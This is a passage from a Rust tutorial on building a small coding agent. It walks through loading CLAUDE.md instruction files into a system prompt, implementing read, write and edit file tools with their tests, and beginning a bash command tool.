        unimplemented!("Convert file_names to Vec<String>")
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".mini-claw/instructions.md"])
    }

    pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
        unimplemented!(
            "Walk up from start_dir, collect matching files, reverse for root-first order"
        )
    }

    pub fn load(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Discover files, read each, join with headers showing source path")
    }

    pub fn system_prompt_section(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Call load(), wrap with instruction preamble")
    }
}

The loader is parameterized by file names to search for. The default configuration looks for CLAUDE.md and .mini-claw/instructions.md.

Rust concept: borrowed slices to owned collections

The constructor takes &[&str] -- a borrowed slice of borrowed string slices -- and converts it to Vec<String>. This is a common Rust pattern at API boundaries: accept borrowed data for flexibility (the caller can pass string literals, &String, or anything that derefs to &str), but store owned data internally so the struct has no lifetime parameter and can live independently of its creator.

Implementing new()

The constructor converts the &[&str] slice into owned String values:

pub fn new(file_names: &[&str]) -> Self {
    Self {
        file_names: file_names.iter().map(|s| s.to_string()).collect(),
    }
}

discover() -- walking upward

The discover() method starts at a given directory and walks toward the filesystem root, checking each directory for the target files:

pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());

    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }

    found.reverse(); // Root-first order
    found
}

The walk collects files from the start directory up to the root, then reverses the list so root-level files come first. This ordering matters: global instructions appear before project-specific ones, and the LLM sees the most specific instructions last (closest to the user prompt).

Consider a project at /home/user/project/backend:

/home/user/CLAUDE.md                  <-- global preferences
/home/user/project/CLAUDE.md          <-- project conventions
/home/user/project/backend/CLAUDE.md  <-- backend-specific rules

After discover(), the vector contains them in that order: global first, most specific last.
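You can exercise this ordering with a standalone version of the walk. Here discover is a simplified free function over a single file name (not the method above), and the directory layout is built in a temp directory:

```rust
use std::path::{Path, PathBuf};

// Standalone sketch of the upward walk: collect matching files from
// start_dir up to the root, then reverse to get root-first order.
fn discover(start_dir: &Path, file_name: &str) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());
    while let Some(current) = dir {
        let candidate = current.join(file_name);
        if candidate.is_file() {
            found.push(candidate);
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }
    found.reverse();
    found
}

fn main() {
    let root = std::env::temp_dir().join("discover_demo");
    let backend = root.join("project/backend");
    std::fs::create_dir_all(&backend).unwrap();
    std::fs::write(root.join("CLAUDE.md"), "global").unwrap();
    std::fs::write(backend.join("CLAUDE.md"), "backend").unwrap();

    let found = discover(&backend, "CLAUDE.md");
    // Root-first: the global file sorts before the backend-specific one.
    let i_root = found.iter().position(|p| p == &root.join("CLAUDE.md")).unwrap();
    let i_backend = found.iter().position(|p| p == &backend.join("CLAUDE.md")).unwrap();
    assert!(i_root < i_backend);
}
```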

load() -- reading and concatenating

The load() method calls discover(), reads each file, and joins them into a single string. Each file's content is prefixed with # Instructions from <path> so the LLM knows where each block came from. Files are separated by --- markers. Empty or unreadable files are silently skipped. If no instruction files exist at all, load() returns None.

The output for two files looks like:

# Instructions from /home/user/CLAUDE.md

Use American English. Prefer explicit error handling.

---

# Instructions from /home/user/project/CLAUDE.md

Run tests with `cargo test`. Never modify generated files.
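One way to sketch load()'s core, consistent with the description above, is as a free function over already-discovered paths so it stands alone. join_instructions is a hypothetical helper name, not part of the starter:

```rust
use std::path::PathBuf;

// Sketch of load()'s body: read each file, silently skip empty or
// unreadable ones, prefix each with a source header, and join the
// sections with --- separators. None if nothing was loaded.
fn join_instructions(paths: &[PathBuf]) -> Option<String> {
    let mut sections = Vec::new();
    for path in paths {
        match std::fs::read_to_string(path) {
            Ok(content) if !content.trim().is_empty() => {
                sections.push(format!(
                    "# Instructions from {}\n\n{}",
                    path.display(),
                    content.trim()
                ));
            }
            _ => {} // empty or unreadable: skip
        }
    }
    if sections.is_empty() {
        None
    } else {
        Some(sections.join("\n\n---\n\n"))
    }
}

fn main() {
    // With no discovered files, the result is None.
    assert_eq!(join_instructions(&[]), None);
}
```

In the starter, the same body would live inside load(), with the paths coming from self.discover(start_dir).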

system_prompt_section() -- wrapping for the prompt

The system_prompt_section() method calls load() and wraps the result with an instruction preamble. This produces a string ready to insert into a system prompt. If no instruction files are found, it returns None.

The exact preamble should read:

format!(
    "The following project instructions were loaded automatically. \
     Follow them carefully:\n\n{content}"
)

The test checks for the substring "project instructions" in the output, so your preamble text must include those words.
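Putting the pieces together, here is a minimal sketch of the wrapping step. wrap_section is a hypothetical free-function stand-in for system_prompt_section that takes load()'s output directly:

```rust
// Sketch of system_prompt_section(): wrap loaded content with the
// preamble, or propagate None when no instruction files were found.
fn wrap_section(loaded: Option<String>) -> Option<String> {
    loaded.map(|content| {
        format!(
            "The following project instructions were loaded automatically. \
             Follow them carefully:\n\n{content}"
        )
    })
}

fn main() {
    assert_eq!(wrap_section(None), None);
    let out = wrap_section(Some("Use cargo test.".into())).unwrap();
    assert!(out.contains("project instructions"));
    assert!(out.ends_with("Use cargo test."));
}
```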

Using InstructionLoader in a system prompt

In a production agent, the instruction loader is wired into the prompt assembly pipeline. The loaded instructions are always dynamic -- they depend on which directory the agent is launched from.

Here is how you might use InstructionLoader to build a simple system prompt:

let mut prompt = String::from("You are a coding agent.\n\n");

let loader = InstructionLoader::default_files();
if let Some(section) = loader.system_prompt_section(Path::new(cwd)) {
    prompt.push_str(&section);
}

A more sophisticated agent would separate static and dynamic sections for prompt caching (see the concepts discussion above), but this simple approach works well for getting started.

How Claude Code does it

Claude Code's prompt assembly follows the same principles at larger scale. Its system prompt includes identity, safety rules, tool schemas, behavioral guidelines, environment details, CLAUDE.md instructions from multiple levels, and session metadata -- routinely exceeding 900 lines.

Without prompt caching, every API call would reprocess all of that. Claude Code marks the cache boundary with a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker. The provider splits the system message at this boundary and sends the prefix with cache_control: { type: "ephemeral" }. The API caches the prefix's internal representation and reuses it for subsequent requests, often covering 80%+ of the prompt.

As an extension, you could build a SystemPromptBuilder that maintains separate lists of static and dynamic sections, renders each half independently, and lets a cache-aware provider split the prompt at the boundary. Our starter focuses on the instruction loading piece, which is the most practically useful component.

Running the tests

Run the InstructionLoader tests:

cargo test -p mini-claw-code-starter instructions

What the tests verify

  • test_instructions_instruction_loader_discover: Creates a temp directory with a CLAUDE.md file and verifies discover() finds it.
  • test_instructions_instruction_loader_load: Same setup, verifies load() returns the file's content.
  • test_instructions_instruction_loader_no_files: No instruction files exist. load() returns None.

Recap

You have built the instruction loading infrastructure:

  • InstructionLoader discovers CLAUDE.md files by walking up the filesystem. It concatenates them in root-first order so that global instructions appear before project-specific ones.
  • system_prompt_section() wraps discovered instructions for inclusion in a system prompt.

You also learned the key concepts behind production system prompt architecture:

  • Prompt sections break the system prompt into named, modular chunks.
  • The cache boundary separates what changes from what does not, enabling prompt caching -- a single optimization that can cut costs and latency by an order of magnitude on long prompts. Every production agent does this.

As an extension, you could implement PromptSection and SystemPromptBuilder types to manage the static/dynamic split structurally. The reference implementation (mini-claw-code) shows one approach.

Key takeaway

A system prompt is not a single string -- it is an assembly of modular sections, ordered so that stable content comes first (enabling prompt caching) and session-specific content comes last. The InstructionLoader is the simplest but most user-facing piece of this assembly: it gives every project a way to customize the agent's behavior through plain Markdown files.

What's next

In Chapter 9: File Tools you will implement the tools that let your agent interact with the filesystem -- reading, writing, and editing files. These are the tools whose schemas will eventually appear in the static portion of your system prompt.

Check yourself


← Chapter 7: The Agentic Loop (Deep Dive) · Contents · Chapter 9: File Tools →

Chapter 9: File Tools

File(s) to edit: src/tools/write.rs, src/tools/edit.rs (the TODO ch9: stubs). src/tools/read.rs was completed back in Chapter 2 -- this chapter revisits it as the baseline and contrasts it with the design decisions that come with writing and editing.
Tests to run: cargo test -p mini-claw-code-starter test_read_ (ReadTool), cargo test -p mini-claw-code-starter test_write_ (WriteTool), cargo test -p mini-claw-code-starter test_edit_ (EditTool)
Estimated time: 50 min

Goal

  • Revisit ReadTool (built in Ch2) as the baseline and understand the trade-offs of its minimal design vs. production tools that add line-numbering and offset/limit.
  • Implement WriteTool with automatic parent directory creation so the agent can create new files without a separate mkdir step.
  • Implement EditTool with a uniqueness check so the agent can make surgical string replacements in existing files.
  • Understand why tool errors are returned as Err(...) in the starter (the agent loop converts them to messages the LLM can read and recover from -- the detailed rationale is in Chapter 6 §"Why tool errors never terminate the agent").

A coding agent that cannot touch the filesystem is just a chatbot with delusions of grandeur. It can describe code changes, suggest fixes, explain algorithms -- but it cannot do any of it. The tools you built in Chapter 6 gave your agent hands. In this chapter you give those hands something to hold: files.

File operations are the most fundamental tools in any coding agent's toolkit. Claude Code ships with Read, Write, and Edit tools (among many others), and every competitor -- Cursor, Aider, OpenCode -- has its own version. The operations are simple (read bytes, write bytes, search-and-replace), but the design choices around them determine whether the agent can reliably modify a codebase or whether it stumbles over its own edits. This chapter works through all three: ReadTool as the baseline you built in Chapter 2, then WriteTool and EditTool from scratch.

How the file tools work together

flowchart LR
    W[WriteTool] -->|creates file| FS[(Filesystem)]
    E[EditTool] -->|search & replace| FS
    R[ReadTool] -->|reads content| FS
    W -.->|"auto-creates parent dirs"| FS
    E -.->|"checks uniqueness first"| FS

sequenceDiagram
    participant LLM
    participant Agent
    participant FS as Filesystem

    LLM->>Agent: write(path, content)
    Agent->>FS: create dirs + write file
    FS-->>Agent: ok
    Agent-->>LLM: "wrote /path/to/file"
    LLM->>Agent: edit(path, old, new)
    Agent->>FS: read, check uniqueness, replace, write
    FS-->>Agent: ok
    Agent-->>LLM: "edited /path/to/file"
    LLM->>Agent: read(path)
    Agent->>FS: read file
    FS-->>Agent: file contents
    Agent-->>LLM: file contents

9.1 ReadTool

ReadTool is the simplest of the file tools: it takes a path, reads the file with tokio::fs::read_to_string, and returns the raw contents as a string. No line numbering, no offset/limit, no transformation. That is what both the starter and the reference implementation (mini-claw-code/src/tools/read.rs) do -- we keep it deliberately minimal so the rest of the chapter (Write, Edit) has room to breathe.

Design discussion: why production agents add more

Production agents like Claude Code go further. Their read tool typically numbers every line (cat -n style) and supports partial reads via offset and limit parameters. Two reasons this matters in real systems:

  • Line numbers give the LLM a coordinate system. "Replace the string on line 42" is precise. "Replace the string somewhere around the middle of the function" is not. This becomes especially valuable for the Edit tool, where the model has to produce an exact string to match and numbered lines help it copy the right chunk.
  • Offset/limit protects the context window. A single 50k-line generated file can blow past the model's context. Paginated reads let the LLM fetch what it needs without burning the whole budget on one file.

Neither of these appears in the starter or the reference implementation in this book -- they are extensions we point at but deliberately leave out so the core Tool implementation stays a dozen lines. Adding them yourself is one of the listed extensions at the end of the chapter.

The starter stub

Open src/tools/read.rs:

use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct ReadTool {
    definition: ToolDefinition,
}

impl Default for ReadTool {
    fn default() -> Self {
        Self::new()
    }
}

impl ReadTool {
    /// Create a new ReadTool with its JSON schema definition.
    ///
    /// The schema should declare one required parameter: "path" (string).
    pub fn new() -> Self {
        unimplemented!(
            "Create a ToolDefinition with name \"read\" and a required \"path\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for ReadTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract \"path\" from args, read file with tokio::fs::read_to_string, return contents"
        )
    }
}

You need to fill in two methods:

  1. new() -- build a ToolDefinition with name "read" and a required "path" parameter.
  2. call() -- extract the path, read the file, and return its contents.

Implementing the ReadTool

The definition. One required parameter: path. The LLM sees this as a JSON Schema and knows it must provide path.

pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}

The call() method. Read the file and return its contents as a String:

async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;

    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;

    Ok(content)
}

Rust concept: anyhow::Context for rich errors

The .context("missing 'path' argument")? and .with_context(|| format!("failed to read '{path}'")) calls wrap the underlying error with a human-readable message. context() takes a ready-made value; with_context() takes a closure for dynamic messages, so the message is only built on the error path and the allocation is avoided on success. Both produce an anyhow::Error that chains the original error underneath -- so the full error message reads like "failed to read 'foo.rs': No such file or directory". This chaining is what makes anyhow errors informative without custom error types.

Notice that call() returns anyhow::Result<String>, not ToolResult. The starter's Tool trait is simplified -- tools return plain strings on success. If the tool encounters an error (missing argument, I/O failure), it returns Err(...). The agent loop converts errors to error messages that the LLM sees.

Possible extensions. A production-grade ReadTool would add offset and limit parameters for partial reads and format output with tab-separated line numbers (like cat -n). Neither is in this book's reference implementation; both are well-scoped exercises if you want to go further.

What the output looks like

Given a file with three lines:

alpha
beta
gamma

The tool returns the raw file contents:

alpha
beta
gamma

This is the simplest approach. Production tools extend it with line numbers and partial-read support, which are useful for large files and for giving the LLM precise line references for later edits -- see the design discussion above.


9.2 WriteTool

Writing a file is conceptually simple: take a path and content, write the content to the path. But there is one practical detail that makes a big difference: creating parent directories automatically.

When the LLM writes src/handlers/auth/middleware.rs, the src/handlers/auth/ directory might not exist yet. A naive tool would fail with "No such file or directory." The agent would then need to call bash("mkdir -p ...") and retry. This wastes a tool-use round and confuses the model. Better to handle it silently.

The starter stub

Open src/tools/write.rs:

use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct WriteTool {
    definition: ToolDefinition,
}

impl Default for WriteTool {
    fn default() -> Self {
        Self::new()
    }
}

impl WriteTool {
    /// Schema: required "path" and "content" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for WriteTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract path and content, create parent dirs, write file, return format!(\"wrote {path}\")"
        )
    }
}

Implementing the WriteTool

The definition. Two required parameters: path and content.

pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("write", "Write content to a file, creating directories as needed")
            .param("path", "string", "Absolute path to write to", true)
            .param("content", "string", "Content to write", true),
    }
}

The call() method. Extract the arguments, create parent directories, write the file, and return a confirmation string:

async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let content = args["content"]
        .as_str()
        .context("missing 'content' argument")?;

    // Create parent directories
    if let Some(parent) = std::path::Path::new(path).parent() {
        if !parent.as_os_str().is_empty() {
            tokio::fs::create_dir_all(parent).await?;
        }
    }

    tokio::fs::write(path, content).await?;

    Ok(format!("wrote {path}"))
}

The return value is format!("wrote {path}") -- a simple confirmation string. The agent sees this and knows the write succeeded.

Walking through the code

Two required parameters. Both path and content are required. There is no optional behavior here -- you always need both.

Auto-creating directories. The create_dir_all call is the key design choice. It mirrors mkdir -p -- if the directory already exists, it is a no-op. If intermediate directories are missing, it creates them all. The guard !parent.as_os_str().is_empty() handles the edge case where the path has no parent component (e.g., a bare filename like "file.txt"), where calling create_dir_all("") would fail.
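The parent-path edge case is easy to verify with std alone: a bare filename's parent() is Some("") (an empty path), not None, which is why the emptiness guard is needed in addition to the if let.

```rust
use std::path::Path;

fn main() {
    // A bare filename has a parent of "" (empty path), not None.
    let bare = Path::new("file.txt");
    assert_eq!(bare.parent(), Some(Path::new("")));

    // A nested path has the expected directory parent.
    let nested = Path::new("src/handlers/auth/middleware.rs");
    assert_eq!(nested.parent(), Some(Path::new("src/handlers/auth")));
}
```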

Overwrite semantics. tokio::fs::write overwrites the file if it already exists and creates it if it does not. There is no append mode, no conflict detection. This is deliberate -- the tool is a clean write, not a merge. If the LLM wants to modify an existing file, it should use the Edit tool.
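The overwrite behavior is easy to confirm with the blocking std::fs::write, which shares tokio::fs::write's semantics (truncate and replace, never append):

```rust
fn main() {
    let path = std::env::temp_dir().join("overwrite_demo.txt");
    std::fs::write(&path, "first").unwrap();
    std::fs::write(&path, "second").unwrap(); // clean overwrite, no append
    assert_eq!(std::fs::read_to_string(&path).unwrap(), "second");
}
```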

Confirmation string. The result reports "wrote /path/to/file". This gives the model confirmation that the write succeeded.


9.3 EditTool

The Edit tool is the most interesting of the three, and it teaches the most important design lesson in this book: errors are values, not exceptions.

The Edit tool performs a search-and-replace on a file. It takes a path, an old_string to find, and a new_string to replace it with. The critical constraint: old_string must appear exactly once in the file. Zero matches means the model got the string wrong. More than one match means the replacement is ambiguous -- we do not know which occurrence to change.

Both of these are expected failure modes, not bugs. The model frequently gets strings slightly wrong (missing whitespace, wrong indentation, stale content from a previous edit). The tool must report these failures clearly so the model can correct itself.

The starter stub

Open src/tools/edit.rs:

use anyhow::{Context, bail};
use serde_json::Value;

use crate::types::*;

pub struct EditTool {
    definition: ToolDefinition,
}

impl Default for EditTool {
    fn default() -> Self {
        Self::new()
    }
}

impl EditTool {
    /// Schema: required "path", "old_string", "new_string" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for EditTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract args, read file, verify old_string appears exactly once, replace, write back"
        )
    }
}

Implementing the EditTool

The definition. Three required parameters: path, old_string, and new_string.

pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new(
            "edit",
            "Replace an exact string in a file. The old_string must appear exactly once.",
        )
        .param("path", "string", "Absolute path to the file to edit", true)
        .param("old_string", "string", "The exact string to find", true)
        .param("new_string", "string", "The replacement string", true),
    }
}

The call() method. Read the file, check uniqueness, replace, write back:

async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let old = args["old_string"]
        .as_str()
        .context("missing 'old_string' argument")?;
    let new = args["new_string"]
        .as_str()
        .context("missing 'new_string' argument")?;

    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;

    let count = content.matches(old).count();
    if count == 0 {
        bail!("old_string not found in '{path}'");
    }
    if count > 1 {
        bail!("old_string appears {count} times in '{path}', must be unique");
    }

    let updated = content.replacen(old, new, 1);
    tokio::fs::write(path, &updated).await?;

    Ok(format!("edited {path}"))
}

The return value is format!("edited {path}") on success.

Walking through the code

Three required parameters. path, old_string, and new_string are all required. The model must specify exactly what to find and what to replace it with. There is no regex, no line-number-based editing, no diff format. Just plain string replacement. This simplicity is a feature -- it is unambiguous and easy for the model to use correctly.

The uniqueness check. This is the heart of the tool:

#![allow(unused)]
fn main() {
let count = content.matches(old).count();
if count == 0 {
    bail!("old_string not found in '{path}'");
}
if count > 1 {
    bail!("old_string appears {count} times in '{path}', must be unique");
}
}

Rust concept: bail! macro

bail!("old_string not found in '{path}'") is shorthand for return Err(anyhow::anyhow!("...")). It immediately returns an error from the function with the given message. It is part of the anyhow crate and works in any function that returns anyhow::Result. Compare with ? (which propagates an existing error) -- bail! creates a new error on the spot.

Two branches, both returning errors via bail!. In the starter's simplified Tool trait, tools return anyhow::Result<String>. When the tool returns an Err, the agent loop converts it to an error message that the LLM sees. The model can then retry with a corrected string.
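The check-and-replace core is pure string logic, so you can exercise it without any file I/O. Here is a minimal sketch (the helper name is hypothetical, and String stands in for anyhow::Error):

```rust
/// Replace `old` with `new` in `content`, requiring `old` to appear exactly once.
/// Mirrors the EditTool's uniqueness check as a pure function.
fn unique_replace(content: &str, old: &str, new: &str) -> Result<String, String> {
    match content.matches(old).count() {
        0 => Err("old_string not found".to_string()),
        1 => Ok(content.replacen(old, new, 1)),
        n => Err(format!("old_string appears {n} times, must be unique")),
    }
}

fn main() {
    // Exactly one match: the edit succeeds.
    assert_eq!(
        unique_replace("fn main() { hello(); }", "hello", "goodbye"),
        Ok("fn main() { goodbye(); }".to_string())
    );
    // Ambiguous match: the model must supply more surrounding context and retry.
    assert!(unique_replace("a a", "a", "b").is_err());
}
```

Either Err becomes a message the model can read and recover from, which is exactly the retry loop described above.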

Error handling in the simplified trait

The starter's Tool trait returns anyhow::Result<String> from call(). This means error handling is straightforward -- use bail!() or ? for any failure, and the agent loop takes care of converting errors to messages the LLM can read.

In the agent's execute_tools method, a tool call is handled like this:

#![allow(unused)]
fn main() {
match tool.call(call.arguments.clone()).await {
    Ok(result) => result,
    Err(e) => format!("error: {e}"),
}
}

An Err from call() becomes a string like "error: old_string not found in 'foo.rs'". The model sees this and knows to try a different string.

A more sophisticated design (used by Claude Code) distinguishes between recoverable tool-level errors (returned as success values) and genuine I/O failures (returned as Err). The starter keeps things simple by using Err for both -- the agent loop handles them the same way regardless.


6.4 Integration: Write, Edit, Read

The real power of these tools comes from combining them. A typical agent workflow looks like this:

  1. Write a new file
  2. Edit to fix a bug or refine the code
  3. Read to verify the result

Here is what that looks like as tool calls:

Agent: I'll create the handler file.
-> write(path: "/tmp/project/handler.rs", content: "fn main() { println!(\"hello\"); }")
<- "wrote /tmp/project/handler.rs"

Agent: Let me update the greeting.
-> edit(path: "/tmp/project/handler.rs", old_string: "hello", new_string: "goodbye")
<- "edited /tmp/project/handler.rs"

Agent: Let me verify the change.
-> read(path: "/tmp/project/handler.rs")
<- "fn main() { println!(\"goodbye\"); }"

Each tool does one thing and communicates its result clearly. The agent sees the output of each step and decides what to do next. If the edit had failed (wrong string), the agent would see the error and retry with the correct string.

This write-edit-read pattern is how Claude Code modifies files in practice. It does not generate a complete file and overwrite -- that would lose any content outside the modified section. Instead, it uses surgical edits on the specific lines that need to change, then reads the result to confirm. This is more reliable and produces smaller diffs.
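The difference is easy to demonstrate with plain string operations: a targeted replacen touches only the matched span, while regenerating and overwriting the whole file loses anything the model failed to reproduce.

```rust
fn main() {
    let original = "fn a() {}\nfn b() { old(); }\nfn c() {}";

    // Surgical edit: only the matched span changes; fn a and fn c survive verbatim.
    let edited = original.replacen("old()", "new()", 1);
    assert_eq!(edited, "fn a() {}\nfn b() { new(); }\nfn c() {}");

    // Full overwrite with a regenerated snippet: everything else is simply gone.
    let overwritten = "fn b() { new(); }";
    assert!(!overwritten.contains("fn a"));
}
```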


6.5 How Claude Code does it

Claude Code's file tools follow the same protocol but with more sophistication:

Read supports images and PDFs. It detects binary files and renders them appropriately (base64-encoded images are sent as multimodal content blocks). It has smarter truncation with token counting rather than character counting, and it warns when a file is empty.

Write checks for protected files. Claude Code maintains a list of files that should never be overwritten (.env, credentials.json, etc.) and blocks writes to them. It also integrates with the permission system to require user approval before overwriting existing files in certain modes.

Edit is considerably more powerful. It supports multiple edits in a single call, has a diff preview mode, handles encoding detection, and validates that the edit produces syntactically valid code (for supported languages). It also has a more nuanced uniqueness check that considers context lines around the match to disambiguate.

But the core protocol is identical to what you just built. A struct holds the definition. The Tool trait provides the interface. The call method does the work. The agent loop dispatches and collects results. Understanding our three simple tools gives you the foundation to understand Claude Code's full tool suite.


6.6 Tool file organization

All three tools live in src/tools/, alongside the other tools you will build in later chapters. The module structure in the starter:

src/tools/
  mod.rs    -- re-exports all tools
  ask.rs    -- AskTool (bonus)
  bash.rs   -- BashTool (Chapter 10)
  edit.rs   -- EditTool
  read.rs   -- ReadTool
  write.rs  -- WriteTool

The mod.rs barrel re-exports everything:

#![allow(unused)]
fn main() {
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
}

This lets consumers write use crate::tools::{ReadTool, WriteTool, EditTool} without reaching into individual modules.


6.7 Tests

Run the file tool tests:

cargo test -p mini-claw-code-starter test_read_   # ReadTool
cargo test -p mini-claw-code-starter test_write_  # WriteTool
cargo test -p mini-claw-code-starter test_edit_   # EditTool

Cargo test filters are substring matches, not regex, so you cannot OR them together into a single invocation. Run the three commands separately, or drop the filter entirely (cargo test -p mini-claw-code-starter) to run everything at once.

Here is what each test verifies:

ReadTool tests (in test_read_)

  • test_read_read_definition -- Checks that the tool definition has the name "read".
  • test_read_read_file -- Reads a file and verifies the content appears in the output.
  • test_read_read_missing_file -- Attempts to read a file that does not exist. Verifies that the result is an Err.

WriteTool tests (in test_write_)

  • test_write_creates_file -- Writes content to a new file, verifies the result contains a confirmation, and reads back the file to confirm the content.
  • test_write_creates_dirs -- Writes to a file inside nested directories. All intermediate directories are created automatically.
  • test_write_overwrites_existing -- Writes to a file that already has content. Verifies the old content is replaced.

EditTool tests (in test_edit_)

  • test_edit_replaces_string -- Edits a string in a file. Verifies the result says "edited" and the file is updated.
  • test_edit_not_found -- Attempts to replace a string that does not exist. Verifies the result is an Err.
  • test_edit_not_unique -- Attempts to replace a string that appears multiple times. Verifies the error mentions the ambiguity.

Recap

Three tools, one pattern. Every tool in this chapter follows the same structure:

  1. A struct with a definition: ToolDefinition field.
  2. A new() constructor that builds the definition with the parameter builder from Chapter 4.
  3. A Tool impl with definition() and call().

The pattern scales. When you add Bash in Chapter 10, the shape is identical -- only the call() logic changes. This is the power of the Tool trait: a uniform interface that makes every tool interchangeable from the agent's perspective.

The key lessons from this chapter:

  • Automate the obvious. The WriteTool creates parent directories automatically, saving the agent a wasted tool-use round.
  • Check uniqueness. The EditTool requires the old string to appear exactly once. Zero matches means the model got the string wrong. Multiple matches means the replacement is ambiguous.
  • Errors propagate cleanly. Tools return anyhow::Result<String>. The agent loop catches errors and converts them to messages the LLM can read and recover from.

Key takeaway

File tools are the agent's hands on the codebase. The three-tool split -- read, write, edit -- gives the LLM clear verbs for distinct operations rather than one overloaded "file" tool. The EditTool's uniqueness check is the single most important design decision: it forces the LLM to provide an unambiguous match, catching mistakes early and enabling reliable self-correction.

In Chapter 10: Bash Tool, you will build the most powerful (and most dangerous) tool in the agent's arsenal -- one that can run arbitrary shell commands.

Check yourself


← Chapter 8: System Prompt · Contents · Chapter 10: Bash Tool →

Chapter 10: Bash Tool

File(s) to edit: src/tools/bash.rs Test to run: cargo test -p mini-claw-code-starter test_bash_ Estimated time: 35 min

Goal

  • Implement BashTool so the agent can run arbitrary shell commands via bash -c and capture combined stdout/stderr output.
  • Handle the three output cases correctly: stdout only, stderr only, and no output (the "(no output)" sentinel).
  • Understand why the tool has no safety rails in this chapter and what later chapters add (permissions, command classification, hooks).

The bash tool is the most powerful tool in a coding agent. It is also the most dangerous. With a single tool call, the LLM can compile code, run tests, install packages, inspect processes, query databases, or delete your entire filesystem. Every other tool -- read, write, edit, grep -- does one thing. Bash does everything.

This power is what makes a coding agent useful. An agent that can only read and write files is a fancy text editor. An agent that can run arbitrary shell commands is a programmer. It can try things, see what happens, and iterate -- the same workflow a human developer follows. Claude Code's bash tool is its most-used tool by far, accounting for the majority of all tool invocations in a typical session.

In this chapter you will build the BashTool. It takes a command string, runs it in a bash subprocess, and returns the combined output. (A timeout is shown later as an extension.) The implementation is straightforward -- the hard part is everything we deliberately leave out. There is no sandboxing, no command filtering, no permission checking. The LLM can run anything. Chapters 13-16 add the safety rails. For now, we build the engine and trust the driver.

How the BashTool processes a command

flowchart TD
    A[LLM sends ToolCall: bash] --> B[Extract command from args]
    B --> C[tokio::process::Command::new bash -c command]
    C --> D[.output captures stdout + stderr]
    D --> E{stdout empty?}
    E -->|No| F[Add stdout to result]
    E -->|Yes| G[Skip]
    F --> H{stderr empty?}
    G --> H
    H -->|No| I["Add 'stderr: ' + stderr"]
    H -->|Yes| J[Skip]
    I --> K{result empty?}
    J --> K
    K -->|Yes| L["Return '(no output)'"]
    K -->|No| M[Return combined result]

The BashTool

Open src/tools/bash.rs. Here is the starter stub:

#![allow(unused)]
fn main() {
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct BashTool {
    definition: ToolDefinition,
}

impl Default for BashTool {
    fn default() -> Self {
        Self::new()
    }
}

impl BashTool {
    /// Schema: one required "command" parameter (string).
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...) to define a required \"command\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract command, run bash -c, combine stdout + stderr, return \"(no output)\" if both empty"
        )
    }
}
}

You need to fill in new() and call(). Here is the complete implementation:

#![allow(unused)]
fn main() {
impl BashTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("bash", "Run a bash command and return its output")
                .param("command", "string", "The bash command to run", true),
        }
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let command = args["command"]
            .as_str()
            .context("missing 'command' argument")?;

        let output = tokio::process::Command::new("bash")
            .arg("-c")
            .arg(command)
            .output()
            .await?;

        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        let mut result = String::new();
        if !stdout.is_empty() {
            result.push_str(&stdout);
        }
        if !stderr.is_empty() {
            if !result.is_empty() {
                result.push('\n');
            }
            result.push_str("stderr: ");
            result.push_str(&stderr);
        }

        if result.is_empty() {
            result.push_str("(no output)");
        }

        Ok(result)
    }
}
}

Let's walk through each piece.

The definition

#![allow(unused)]
fn main() {
ToolDefinition::new("bash", "Run a bash command and return its output")
    .param("command", "string", "The bash command to run", true)
}

